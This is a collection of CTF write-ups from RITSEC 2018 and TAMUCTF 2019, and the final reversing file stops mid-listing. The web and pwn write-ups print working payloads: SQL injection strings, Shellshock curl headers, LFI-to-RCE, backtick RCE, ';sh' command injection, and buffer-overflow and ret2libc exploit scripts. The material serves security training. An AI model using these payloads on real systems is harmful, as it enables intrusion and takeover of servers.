├── README.md
├── RITSEC CTF 2018
│   ├── Forensics
│   │   ├── Burn_The_Candle_On_Both_Ends.md
│   │   └── I_am_a_Stegosaurus.md
│   ├── Misc
│   │   └── Music.png.md
│   ├── README.md
│   └── Web
│       ├── Crazy_Train.md
│       ├── Lazy_Dev.md
│       ├── Space_Force.md
│       ├── The_Tangled_Web.md
│       └── What_A_Cute_Dog.md
├── TAMUCTF 2019
│   ├── Android
│   │   └── localNews.md
│   ├── Pentest
│   │   ├── StopAndListen.md
│   │   └── image-stopAndListen
│   │       ├── follow.png
│   │       └── udp-traffic.png
│   ├── Pwn
│   │   ├── pwn1.md
│   │   ├── pwn2.md
│   │   ├── pwn4.md
│   │   └── pwn5.md
│   ├── Reverse
│   │   └── 042.md
│   ├── Secure Coding
│   │   ├── SQL.md
│   │   ├── loginapp2.md
│   │   ├── pwn.md
│   │   └── science.md
│   └── Web
│       ├── images
│       │   └── loginapp2-request.png
│       └── loginapp2.md
└── TUCTF 2018
    ├── Misc
    │   └── hardDOS.md
    ├── README.md
    ├── Reverse
    │   ├── Danger_Zone.md
    │   └── YeahRight.md
    └── Web
        ├── Colonel_Mustard's_Simple_Signin.md
        ├── Easter_Egg:_Copper_Gate.md
        ├── Easter_Egg:_Crystal_Gate.md
        ├── Easter_Egg:_Jade_Gate.md
        ├── Miss_Scarlet's_Resume_Requests.md
        ├── Mr._Green's_Weird_Website.md
        ├── Mrs._White's_Messy_Maids.md
        └── Professor_Plum's_Ravenous_Researcher.md

/README.md:
--------------------------------------------------------------------------------
# Writeups
Different writeups and solutions for all the CTF contests we've played!

--------------------------------------------------------------------------------
/RITSEC CTF 2018/Forensics/Burn_The_Candle_On_Both_Ends.md:
--------------------------------------------------------------------------------
## Burn The Candle On Both Ends - Forensics 150:

**Description:** It's a two step problem
**Challenge:** candle.jpg
**Difficulty:** Easy
**Solved by:** Eric & Tahar

**Solution:**
We downloaded the challenge file and used the **file** command in the Linux terminal to identify it: a normal JPG image!
Running the well-known forensics toolkit **Binwalk** over it shows an interesting ZIP file embedded in the image:
```
binwalk candle.jpg
```

We start by extracting that ZIP file from the challenge file. There are many ways to do that: we can use a **Hex Editor** and copy the hex data out into a new zip file, or use **dd**, or the same toolkit **Binwalk**, or **Foremost** (another well known digital forensics tool). With **Binwalk** the command is:
```
binwalk -e candle.jpg
```

After that we got an **Encrypted ZIP Archive**. The description did not say much, but it did mention that this is a two step challenge: the first step was extracting the hidden ZIP file, so the second step is probably bruteforcing that ZIP archive!

We use the well known **rockyou** wordlist to bruteforce the ZIP archive. **fcrackzip** did not work, so we turned to another well known toolkit, **John The Ripper**, a password & hash cracking suite.
We used its **zip2john** helper to get a crackable hash of the ZIP archive with the command: ```zip2john archive.zip > hash.txt```

Then, we got a hash; time to crack it using **rockyou & John**.
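Going back to the first step of this challenge (finding and carving the archive), here is an added example that is not part of the original writeup: a small Python script that does by hand what the two binwalk commands did, scanning a file for known signatures, carving the ZIP that follows the JPEG end-of-image marker, and reporting whether its entries are password-protected. The JPEG-with-appended-ZIP input is constructed inline (it is not candle.jpg), and the "encrypted" variant only sets the archive's encryption flag bit to mimic the metadata of a password-protected archive.

```python
import io
import struct
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"   # start of every ZIP local file header
ZIP_CENTRAL_DIR = b"PK\x01\x02"    # start of a central directory entry
JPEG_SOI = b"\xff\xd8"             # JPEG start of image
JPEG_EOI = b"\xff\xd9"             # JPEG end of image


def build_sample_image(encrypted_flag=False):
    """Constructed sample (not candle.jpg): a tiny JPEG-shaped blob followed by
    a ZIP archive, the layout binwalk reported for the challenge file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.txt", "constructed placeholder, not a real flag\n")
    zip_bytes = bytearray(buf.getvalue())
    if encrypted_flag:
        # Bit 0 of the general-purpose flag marks an entry as encrypted. It lives
        # at offset 6 of the local header and offset 8 of the central directory
        # entry; setting it mimics a password-protected archive's metadata.
        zip_bytes[zip_bytes.find(ZIP_LOCAL_HEADER) + 6] |= 1
        zip_bytes[zip_bytes.find(ZIP_CENTRAL_DIR) + 8] |= 1
    jpeg = JPEG_SOI + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00" + b"\x00" * 9
    jpeg += b"\x11\x22\x33" * 50 + JPEG_EOI   # filler standing in for scan data
    return jpeg + bytes(zip_bytes)


def scan_signatures(data):
    """binwalk-style signature scan: every (offset, description) where a known
    magic value appears, sorted by offset."""
    hits = []
    for name, magic in (("JPEG image data", JPEG_SOI),
                        ("JPEG end of image", JPEG_EOI),
                        ("Zip archive data", ZIP_LOCAL_HEADER)):
        start = 0
        while (off := data.find(magic, start)) != -1:
            hits.append((off, name))
            start = off + 1
    return sorted(hits)


def carve_zip(data):
    """Carve the first embedded ZIP (what `binwalk -e` did) and describe it
    without extracting: entry names and whether each one needs a password."""
    off = data.find(ZIP_LOCAL_HEADER)
    if off == -1:
        return {"offset": -1, "entries": []}
    with zipfile.ZipFile(io.BytesIO(data[off:])) as zf:
        entries = [{"name": zi.filename, "encrypted": bool(zi.flag_bits & 0x1)}
                   for zi in zf.infolist()]
    return {"offset": off, "entries": entries}


if __name__ == "__main__":
    sample = build_sample_image(encrypted_flag=True)
    for off, name in scan_signatures(sample):
        print(f"{off:<8}{name}")
    print(carve_zip(sample))
```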
We run the following command to launch the **BruteForce Attack**: ```john --wordlist=rockyou.txt --format=zip hash.txt```

Successful attack, password: **stegosaurus**

Now it is time to grab the flag by extracting the **flag.txt** file from the decrypted ZIP archive =)

**Flag:**
RITSEC{8U51N355–1N-7H3-Fr0N7-P4r7Y-1N-7H3–84CK}

--------------------------------------------------------------------------------
/RITSEC CTF 2018/Forensics/I_am_a_Stegosaurus.md:
--------------------------------------------------------------------------------
## I am a Stegosaurus - Forensics 250:

**Description:** Look Closely
**Challenge:** stegosaurus.png
**Difficulty:** Easy
**Solved by:** Tahar & Eric

**Solution:**
Honestly, I was using Windows with virtualization software (Workstation & VBox), so I downloaded the file on Windows, just opened it and got the flag x"D so funny!!

But my team mate **Eric** used Linux, where the image did not open, and he wrote the proper solution for this challenge! Check out his detailed writeup:
https://medium.com/@thereallulz/writeup-ritsec-ctf-2018-forensics-by-thereallulz-eb06196e7ae1#c58d

**Flag:**
RITSEC{th1nk_0uts1d3_th3_b0x}

--------------------------------------------------------------------------------
/RITSEC CTF 2018/Misc/Music.png.md:
--------------------------------------------------------------------------------
## Music.png - Misc 300:

**Description:** Name that tune
**Challenge:** music.png
**Difficulty:** Medium
**Solved by:** Tahar

**Solution:**
We start by downloading the challenge file and opening it: we see what looks like random colours & dots! I tried many of the tricks I have used on steganography challenges before, and none worked. I asked for help and a friend gave me a hint, a single word that let me work on it till the end!

My friend said: LSB.
It means the "**Least Significant Bit**", and I was able to start working on it from just this little one-word hint! I always use a well known toolkit for LSB challenges, **Zsteg**, which you can find on GitHub. I downloaded the tool and installed it on my VM to start solving the challenge.

I ran the **zsteg** toolkit with the following command: ```zsteg -all music.png```, and got some kind of weird text repeated throughout the tool's output. That was actually an interesting thing to look into.

I started by **Googling** that output text, and found out that it was a piece of music :3 **https://jhirniak.github.io/Never-Gonna-Rick-You-Up/index.html**

I Googled again using the name in the **URL** ```Never-Gonna-Rick-You-Up``` and found another well known song (following the challenge description: **Name that tune**). So probably the name of that tune is the flag we are looking for!

I built my flag and solved the challenge; it took me a lot of time and overthinking =)
**https://www.youtube.com/watch?v=dQw4w9WgXcQ**

**Flag:**
RITSEC{never_gonna_give_you_up}

--------------------------------------------------------------------------------
/RITSEC CTF 2018/README.md:
--------------------------------------------------------------------------------
## RITSEC CTF 2018:
RITSEC CTF 2018 is a security-focused competition that features the following categories: Binary, Crypto, Forensics, Programming, and Web. We welcome beginners and more advanced security friends! There will be three brackets: RIT students, other college students, and everyone else.
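Added example for the Music.png LSB challenge above (not the author's code, and not zsteg itself): a minimal zsteg-style extractor over a constructed RGB pixel buffer. It embeds a message in the lowest bit plane, then sweeps the channel subsets and the two lowest bit planes the way zsteg does, keeping any candidate that decodes to printable text. The cover image, the message and the `b1,rgb,lsb,xy` naming are assumptions made here for illustration.

```python
import itertools
import random
import string

PRINTABLE = set(string.printable.encode())


def make_cover(pixels=400, seed=1):
    """Constructed cover image: `pixels` RGB triples of pseudo-random bytes
    (stands in for music.png; no real image file is needed)."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(pixels * 3))


def embed_lsb(pixels, message):
    """Hide message (plus a NUL terminator) in bit 0 of consecutive channel
    bytes, most significant bit first: the plane zsteg lists as b1,rgb,lsb,xy."""
    payload = message + b"\x00"
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("cover too small for message")
    out = bytearray(pixels)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit
    return bytes(out)


def extract_lsb(pixels, channels=(0, 1, 2), bit=0, max_len=4096):
    """Read `bit` of the chosen channels of every pixel in row order, pack
    eight bits per byte (MSB first) and stop at the first NUL byte."""
    bits = [(pixels[p + c] >> bit) & 1
            for p in range(0, len(pixels), 3) for c in channels]
    out = bytearray()
    for i in range(0, len(bits) - 7, 8):
        byte = 0
        for b in bits[i:i + 8]:
            byte = (byte << 1) | b
        if byte == 0 or len(out) >= max_len:
            break
        out.append(byte)
    return bytes(out)


def scan_lsb(pixels, min_len=8):
    """zsteg-like sweep: try the two lowest bit planes and every channel subset,
    keeping candidates that decode to at least min_len printable bytes."""
    found = {}
    for bit in (0, 1):
        for n in (1, 2, 3):
            for chans in itertools.combinations((0, 1, 2), n):
                data = extract_lsb(pixels, chans, bit)
                if len(data) >= min_len and all(b in PRINTABLE for b in data):
                    found[(bit, chans)] = data
    return found


MESSAGE = b"constructed hidden text: name that tune"

if __name__ == "__main__":
    stego = embed_lsb(make_cover(), MESSAGE)
    for (bit, chans), data in scan_lsb(stego).items():
        print(f"b{bit + 1},{''.join('rgb'[c] for c in chans)},lsb,xy : {data!r}")
```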

--------------------------------------------------------------------------------
/RITSEC CTF 2018/Web/Crazy_Train.md:
--------------------------------------------------------------------------------
## Crazy Train - Web 250:

**Description:** N/A
**Challenge:** fun.ritsec.club:3000
**Difficulty:** Easy
**Solved by:** Tahar Amine ELHOUARI

**Solution:**
We are presented with a web application based on **Ruby on Rails**; it is all about posting and submitting articles to the app!!
When we try to submit an article, we are given two inputs to write in. The team spent a lot of time on it, until I realised that there is a hidden third input in the page. I have seen many people trying to XSS the app, but I know that most CTF contests don't use XSS in web challenges; it is a useless vulnerability in most CTFs. So I thought it is probably a command injection or an RCE. A friend from another team hinted that I was close, but that there was a hidden input, so I started trying command injection through it, without success.

Later, I started trying to exploit an **RCE** (Remote Code Execution). It didn't work, but the friend told me I was close! Then I remembered that this is a **Ruby on Rails** challenge and not a PHP web app, so the exploitation payload must be different because it is a different language with a different syntax! As usual I started googling for guides about web application hacking/security in apps based on Ruby on Rails, and I think that is the reason for the challenge's name, **Crazy Train**: it is crazy, and Train refers to the Rails.
After googling I learned how to exploit an RCE vulnerability in Rails and I succeeded using the following payload (backticks included): **`` `cat flag.txt` ``**

Note: I couldn't write the right payload in GitHub's Markdown!
Use **ALT GR + 7** on your keyboard to get the character (a backtick) that I used before & after **cat flag.txt**.
It is something like this ' cat flag.txt ' with backticks in place of the quotes; I hope you got my point!!

**Flag:**
RITSEC{W0wzers_who_new_3x3cuting_c0de_to_debug_was_@_bad_idea}

--------------------------------------------------------------------------------
/RITSEC CTF 2018/Web/Lazy_Dev.md:
--------------------------------------------------------------------------------
## Lazy Dev - Web 400:

**Description:** N/A
**Challenge:** fun.ritsec.club:8007
**Difficulty:** Easy
**Solved by:** Milan

**Solution:**
The final web challenge, with a link: **http://fun.ritsec.club:8007**.
Hmm, it takes us back to The Tangled Web challenge. At first I thought it was a mistake, but after reviewing all the pages I had crawled, I saw a comment which led us further. The comment was found in **http://fun.ritsec.club:8007/Stars.html** and it goes like this:

**<-- REMOVE THIS NOTE LATER -->**
**<-- Getting remote access is so much work. Just do fancy things on devsrule.php -->**

So I went to http://fun.ritsec.club:8007/devsrule.php and was welcomed with:
**Not what you input eh?**
**This param is 'magic' man.**
**Well, it is said that the parameter is magic.**

I started poking around and after a while I finally figured out that it is LFI to RCE! We have to use the **php://input wrapper**!

I intercepted the **GET request with Burp Suite** and changed it to **POST /devsrule.php?magic=php://input HTTP/1.1**
The next thing was to add the **POST data**, so I sent `````` and got this response:
**Not what you input eh?**
**This param is 'magic' man.**
**uid=33(www-data) gid=33(www-data) groups=33(www-data)**

The next step was to find the flag. With some simple poking around we found it in **/home/joker/flag.txt**
To read the flag we execute `````` and we get the flag in the response!

**Flag:**
RITSEC{WOW_THAT_WAS_A_PAIN_IN_THE_INPUT}

--------------------------------------------------------------------------------
/RITSEC CTF 2018/Web/Space_Force.md:
--------------------------------------------------------------------------------
## Space Force - Web 100:

**Description:** The Space Force has created a portal for the public to learn about and be in awe of our most elite Space Force Fighters.
**Challenge:** fun.ritsec.club:8005
**Difficulty:** Easy
**Solved by:** Milan

**Solution:**
We are provided with a URL: http://fun.ritsec.club:8005/
When we open the challenge, we are presented with a ship leaderboard. If we enter one of the listed ships, we can see its records. If we type **'**, the text changes to **Something went wrong with your record query! What are you trying to do???**, which clearly indicates an SQL injection vulnerability!

We can simply query all records with the following payload: **' or 'x'='x**

**Flag:**
RITSEC{hey_there_h4v3_s0me_point$_3ny2Lx}

--------------------------------------------------------------------------------
/RITSEC CTF 2018/Web/The_Tangled_Web.md:
--------------------------------------------------------------------------------
## The Tangled Web - Web 200:

**Description:** N/A
**Challenge:** fun.ritsec.club:8007
**Difficulty:** Easy
**Solved by:** Milan

**Solution:**
The main thing here was to **crawl the complete website and inspect the responses**. I used **Burp Suite** for that task. The first URL that stood out was **http://fun.ritsec.club:8007/Fl4gggg1337.html**; unfortunately, that was a troll.
The second thing worth paying attention to was **http://fun.ritsec.club:8007/Stars.html**. It contains a paragraph that is **encoded in base64**.

**UklUU0VDe0FSM19ZMFVfRjMzNzFOR18xVF9OMFdfTVJfS1I0QjU/IX0=**, which we can decode using the Decoder tab in Burp Suite or by running this command in a terminal: **echo "UklUU0VDe0FSM19ZMFVfRjMzNzFOR18xVF9OMFdfTVJfS1I0QjU/IX0=" | base64 -d**.
The output is the flag!

**Flag:**
RITSEC{AR3_Y0U_F3371NG_1T_N0W_MR_KR4B5?!}

--------------------------------------------------------------------------------
/RITSEC CTF 2018/Web/What_A_Cute_Dog.md:
--------------------------------------------------------------------------------
## What a Cute Dog - Web 350:

**Description:** This dog is shockingly cute!
**Challenge:** fun.ritsec.club:8008
**Difficulty:** Easy
**Solved by:** Milan

**Solution:**
Upon opening the given URL, we see a shockingly cute dog! And some stats: **Mon Nov 19 11:06:51 UTC 2018 11:06:51 up 2 days, 18:54, 0 users, load average: 0.00, 0.00, 0.03**.
Inspecting the source we see an interesting link: **http://fun.ritsec.club:8008/cgi-bin/stats**. Googling this, we found an exploit for stats. And guess what, it is a **Shellshock exploit (CVE-2014-6271)**.

We are going to use this command to start looking for the flag: **curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'uname -a;'" http://fun.ritsec.club:8008/cgi-bin/stats**

After some time spent searching for the flag, I remembered that the flag is almost always named **flag.txt**. So I ran this command in the terminal to get its exact location:
**curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -name flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats**

**flag.txt** was found in the **/opt/** folder. The final step was to read the flag.
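From the defender's side, the requests in this writeup are easy to spot in a web server's access log. Added example, not part of the original writeup: a small Python detector over constructed Apache-style log lines that flags the `() {` function-definition marker of CVE-2014-6271 in the User-Agent and Referer fields, notes whether the target was a CGI path, and pulls out the text that followed the marker for triage. The log lines and addresses are constructed here, not taken from the challenge host.

```python
import re

# Apache "combined" log format:
# client ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# CVE-2014-6271 trigger: a header value that starts with a bash function
# definition "() { ... }"; whatever follows the closing brace is executed when
# a CGI handler exports the header as an environment variable.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;?(?P<tail>.*)")


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def inspect(entry):
    """Return a finding if the user-agent or referer carries the marker."""
    for field in ("ua", "referer"):
        m = SHELLSHOCK_RE.search(entry[field])
        if m:
            parts = entry["request"].split()
            path = parts[1] if len(parts) > 1 else entry["request"]
            return {
                "ip": entry["ip"],
                "time": entry["time"],
                "path": path,
                "field": field,
                "cgi": "/cgi-bin/" in path,        # CGI is where headers become env vars
                "tail": m.group("tail").strip(),   # what the sender asked bash to run
            }
    return None


def scan_log(lines):
    """Run the detector over an iterable of log lines; skip lines that don't parse."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        finding = inspect(entry)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log (not from the challenge host). Two of the four entries
# carry the probe pattern shown in the writeup, one in each header field.
SAMPLE_LOG = """
203.0.113.7 - - [19/Nov/2018:11:06:51 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [19/Nov/2018:11:07:02 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 128 "-" "() { :; }; echo; echo; /bin/bash -c 'uname -a;'"
198.51.100.4 - - [19/Nov/2018:11:07:30 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "curl/7.58.0"
203.0.113.7 - - [19/Nov/2018:11:07:45 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 96 "() { :; }; echo; echo; /bin/bash -c 'cat /opt/flag.txt;'" "Mozilla/5.0"
""".strip().splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} via {f['field']}: {f['tail']}")
```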
**curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats**

**Flag:**
RITSEC{sh3ll_sh0cked_w0wz3rs}

--------------------------------------------------------------------------------
/TAMUCTF 2019/Android/localNews.md:
--------------------------------------------------------------------------------
## Local News - Android

**Description:** Be sure to check your local news broadcast for the latest updates!
**Challenge:** app.apk
**Difficulty:** medium-hard
**Solved by:** Neolex

**Solution:**
The challenge gives us an **apk**, the package format of an **Android application**.
I used **jadx** to analyze the decompiled code of the apk:
```
$ jadx-gui --deobf ./app.apk
```
Let's look at the **MainActivity** code:
```java
public class MainActivity extends AppCompatActivity {

    /* renamed from: com.tamu.ctf.hidden.MainActivity$1 */
    class C00141 extends BroadcastReceiver {
        C00141() {
        }

        public void onReceive(Context context, Intent intent) {
            Log.d(MainActivity.this.getString(C0017R.string.flag), Deobfuscator$app$Debug.getString(0));
        }
    }

    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView((int) C0017R.layout.activity_main);
        BroadcastReceiver hidden = new C00141();
        IntentFilter filter = new IntentFilter();
        filter.addAction(getString(C0017R.string.hidden_action));
        LocalBroadcastManager.getInstance(this).registerReceiver(hidden, filter);
    }
}
```
We can see a **BroadcastReceiver** being created, and its **onReceive** callback logs the flag. I first thought I should trigger that callback, but in the end I decided to use **Frida** to call the function that returns the flag directly.
Here is my Frida script:
```javascript
'use strict';

if (Java.available) {
    Java.perform(function () {
        // the class the BroadcastReceiver calls; getString(0) returns the deobfuscated flag
        var deobf = Java.use('io.michaelrocks.paranoid.Deobfuscator$app$Debug');
        var flag = deobf.getString(0);
        console.log('[+] flag: ' + flag);
    });
}
```
In this script I call the **getString** function of the **io.michaelrocks.paranoid.Deobfuscator\$app\$Debug** class with the argument **0**, like the BroadcastReceiver would.
I run frida-server and the challenge's application on my Android emulator, then run this command to load the script:
```
$ frida -U com.tamu.ctf.hidden -l script.js
     ____
    / _  |   Frida 12.2.26 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at http://www.frida.re/docs/home/
Attaching...
[+] flag: gigem{hidden_81aeb013bea}

```
**Flag:**
gigem{hidden_81aeb013bea}


--------------------------------------------------------------------------------
/TAMUCTF 2019/Pentest/StopAndListen.md:
--------------------------------------------------------------------------------
## Stop and Listen - Network/Pentest

**Description:** Sometimes you just need to stop and listen.
This challenge is an introduction to our network exploit challenges, which are hosted over OpenVPN.
**Challenge:** listen.openvpn
**Difficulty:** easy
**Solved by:** Neolex

**Solution:**
This challenge gives us an OpenVPN config to connect to their network.
Let's connect to the VPN with openvpn: ```sudo openvpn --config listen.ovpn```
Now the challenge name tells us to listen, so I used Wireshark to see if there was any traffic on the network.
We can see some UDP traffic:
![](./image-stopAndListen/udp-traffic.png)
Let's follow the UDP stream:
![](./image-stopAndListen/follow.png)

Here is the flag!

**Flag:**
gigem{f0rty_tw0_c9d950b61ea83}

--------------------------------------------------------------------------------
/TAMUCTF 2019/Pentest/image-stopAndListen/follow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ImperiumCTF/Writeups/1a4370560b263623f3ad3d3aa1a9189bab143637/TAMUCTF 2019/Pentest/image-stopAndListen/follow.png

--------------------------------------------------------------------------------
/TAMUCTF 2019/Pentest/image-stopAndListen/udp-traffic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ImperiumCTF/Writeups/1a4370560b263623f3ad3d3aa1a9189bab143637/TAMUCTF 2019/Pentest/image-stopAndListen/udp-traffic.png

--------------------------------------------------------------------------------
/TAMUCTF 2019/Pwn/pwn1.md:
--------------------------------------------------------------------------------
## Pwn1 - Pwn

**Description:** `nc pwn.tamuctf.com 4321`
**Challenge:** pwn1
**Difficulty:** easy
**Solved by:** Neolex

**Solution:**
This challenge is a simple **buffer overflow**.
First, the binary asks us a question:
"Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?"
We have to answer: "Sir Lancelot of Camelot"
Then another one: "What... is your quest?"
We answer: "To seek the Holy Grail."
Then the question is: "What... is my secret?"
This time the call that reads the answer is not fgets but **gets**, which is a vulnerable function (see ```man gets```):
```
BUGS
       Never use gets().  Because it is impossible to tell without knowing the data in advance how many
       characters gets() will read, and because gets() will continue to store characters past the end
       of the buffer, it is extremely dangerous to use.  It has been used to break computer security.
       Use fgets() instead

```
If we enter "A"*43+"BBBB" the binary returns to 0x42424242, which is our B's: we control the execution.
Fortunately the binary gives us a function "print_flag" at address 0xdea110c8 which prints the content of the file flag.txt.
So here is our exploit script:
```python
from pwn import *

# p = process('./pwn1')
p = remote('wn.tamuctf.com', 4321)

# answer the two scripted questions to reach the gets() call
p.recvuntil(b"name?")
p.sendline(b"Sir Lancelot of Camelot")
p.recvuntil(b"quest?")
p.sendline(b"To seek the Holy Grail.")
p.recvuntil(b"secret?")

# 43 bytes of padding up to the saved return address, then print_flag
payload = b"A" * 43
payload += p32(0xdea110c8)

p.sendline(payload)
print(p.recvall().decode())
```
Let's run it:
```
$ python exploit.py
[+] Opening connection to wn.tamuctf.com on port 4321: Done
[+] Receiving all data: Done (50B)
[*] Closed connection to wn.tamuctf.com port 4321

Right. Off you go.
gigem{34sy_CC428ECD75A0D392}
```

**Flag:**
gigem{34sy_CC428ECD75A0D392}


--------------------------------------------------------------------------------
/TAMUCTF 2019/Pwn/pwn2.md:
--------------------------------------------------------------------------------
## Pwn2 - Pwn

**Description:** ```nc pwn.tamuctf.com 4322```
**Challenge:** pwn2
**Difficulty:** easy
**Solved by:** Neolex

**Solution:**
First the binary asks us a question: "Which function would you like to call?"
Let's send a lot of A's: the program **segfaults** at address **0x56555641**.
The 41 is the byte we control in the address being called, because 0x41 is the ASCII value of "A".
Let's call the function print_flag, which is at 0x565556d8:
```
gdb-peda$ p print_flag
$1 = {} 0x565556d8
```
So we just have to send a lot of 0xd8 bytes to call the print_flag function:
```python
from pwn import *

p = remote('wn.tamuctf.com', 4322)
# only the low byte of the called address is overwritten, so repeat 0xd8
p.sendline(b'\xd8' * 500)
print(p.recvall().decode())
```
Let's run it:
```
$ python exploit.py
[+] Opening connection to wn.tamuctf.com on port 4322: Done
[+] Receiving all data: Done (109B)
[*] Closed connection to wn.tamuctf.com port 4322
Which function would you like to call?
This function is still under development.
gigem{4ll_17_74k35_15_0n3}
```
We got the flag!

**Flag:**
gigem{4ll_17_74k35_15_0n3}

--------------------------------------------------------------------------------
/TAMUCTF 2019/Pwn/pwn4.md:
--------------------------------------------------------------------------------
## Pwn4 - Pwn

**Description:** ```nc pwn.tamuctf.com 4324```
**Challenge:** pwn4
**Difficulty:** medium
**Solved by:** Neolex

**Solution:**
The vulnerability is, again, a call to the vulnerable **gets** function. We need to send 37 bytes to reach the return address. This time we don't have a print_flag function, so we're going to use ret2libc to call **system** with the **/bin/sh** string:
Let's find a call to system:
```
.text:080485AD call _system
```
The address is 0x080485AD.
Now let's find the address of a **/bin/sh** string in GDB:
```
gdb-peda$ searchmem /bin/sh
Searching for '/bin/sh' in: None ranges
Found 2 results, display max 2 items:
pwn4 : 0x804a034 ("/bin/sh")
```
The address is 0x804a034.
Here is the exploit code:
```python
from pwn import *

system = 0x080485AD   # address of the "call _system" instruction
binsh = 0x804a034     # address of the "/bin/sh" string in the binary

p = remote('pwn.tamuctf.com', 4324)
p.recvuntil(b'ls:')

# 37 bytes to reach the saved return address; returning to the call
# instruction pushes a return address, so binsh lands where system expects its argument
payload = b"A" * 37
payload += p32(system)
payload += p32(binsh)
p.sendline(payload)
p.interactive()
```
Run the exploit:
```
$ python exploit.py
[+] Opening connection to pwn.tamuctf.com on port 4324: Done
[*] Switching to interactive mode

Result of ls AAAAAAAAAAAAAAAAAAAAAAA:
$ ls
flag.txt
pwn4
$ cat flag.txt
gigem{5y573m_0v3rfl0w}
```
**Unintended Solution:**
There was an unintended solution to this challenge: just sending ";sh" gives us a shell.
The issue is that the input is inserted into the string "ls %s", so if we terminate the ls command with **;** and call the sh command we get a shell:
```
$ nc pwn.tamuctf.com 4324
ls as a service (laas)(Copyright pending)
Enter the arguments you would like to pass to ls:
;sh
Result of ls ;sh:
flag.txt
pwn4
ls
flag.txt
pwn4
cat flag.txt
gigem{5y573m_0v3rfl0w}
```
**Flag:**
gigem{5y573m_0v3rfl0w}

--------------------------------------------------------------------------------
/TAMUCTF 2019/Pwn/pwn5.md:
--------------------------------------------------------------------------------
## Pwn5 - Pwn

**Description:** ```nc pwn.tamuctf.com 4325```
**Challenge:** pwn5
**Difficulty:** medium
**Solved by:** Neolex

**Solution:**
Here I used an unintended solution: just sending ";sh" gives us a shell.
The issue is that the input is inserted into the string "ls %s" in the **run_cmd** function, so if we terminate the ls command with **;** and call the sh command we get a shell:
```
$ nc pwn.tamuctf.com 4325
ls as a service (laas)(Copyright pending)
Version 2: Less secret strings and more portable!
Enter the arguments you would like to pass to ls:
;sh
Result of ls ;sh:
flag.txt
pwn5
cat flag.txt
gigem{r37urn_0r13n73d_pr4c71c3}
```
**Flag:**
gigem{r37urn_0r13n73d_pr4c71c3}

--------------------------------------------------------------------------------
/TAMUCTF 2019/Reverse/042.md:
--------------------------------------------------------------------------------
## 042 - Reversing

**Description:** Cheers for actual assembly!
**Difficulty:** Medium
**Solved by:** Neolex

**Solution:**
The challenge gives us an assembly listing:
```asm
    .section    __TEXT,__text,regular,pure_instructions
    .build_version macos, 10, 14
    .globl  _concat                 ## -- Begin function concat
    .p2align    4, 0x90
_concat:                                ## @concat
    .cfi_startproc
## %bb.0:
    pushq   %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset %rbp, -16
    movq    %rsp, %rbp
    .cfi_def_cfa_register %rbp
    subq    $48, %rsp
    movq    %rdi, -8(%rbp)
    movq    %rsi, -16(%rbp)
    movq    -8(%rbp), %rdi
    callq   _strlen
    movq    -16(%rbp), %rdi
    movq    %rax, -32(%rbp)         ## 8-byte Spill
    callq   _strlen
    movq    -32(%rbp), %rsi         ## 8-byte Reload
    addq    %rax, %rsi
    addq    $1, %rsi
    movq    %rsi, %rdi
    callq   _malloc
    movq    $-1, %rdx
    movq    %rax, -24(%rbp)
    movq    -24(%rbp), %rdi
    movq    -8(%rbp), %rsi
    callq   ___strcpy_chk
    movq    $-1, %rdx
    movq    -24(%rbp), %rdi
    movq    -16(%rbp), %rsi
    movq    %rax, -40(%rbp)         ## 8-byte Spill
    callq   ___strcpy_chk
    movq    -24(%rbp), %rdx
    movq    %rax, -48(%rbp)         ## 8-byte Spill
    movq    %rdx, %rax
    addq    $48, %rsp
    popq    %rbp
    retq
    .cfi_endproc
                                        ## -- End function
    .globl  _main                   ## -- Begin function main
    .p2align    4, 0x90
_main:                                  ## @main
    .cfi_startproc
## %bb.0:
    pushq   %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset %rbp, -16
    movq    %rsp, %rbp
    .cfi_def_cfa_register %rbp
    subq    $80, %rsp
    leaq    L_.str(%rip), %rdi
    movl    $3, %eax
    movl    $14, %ecx
    xorl    %esi, %esi
    movl    $8, %edx
    ## kill: def %rdx killed %edx
    leaq    -16(%rbp), %r8
    movq    ___stack_chk_guard@GOTPCREL(%rip), %r9
    movq    (%r9), %r9
    movq    %r9, -8(%rbp)
    movl    $0, -20(%rbp)
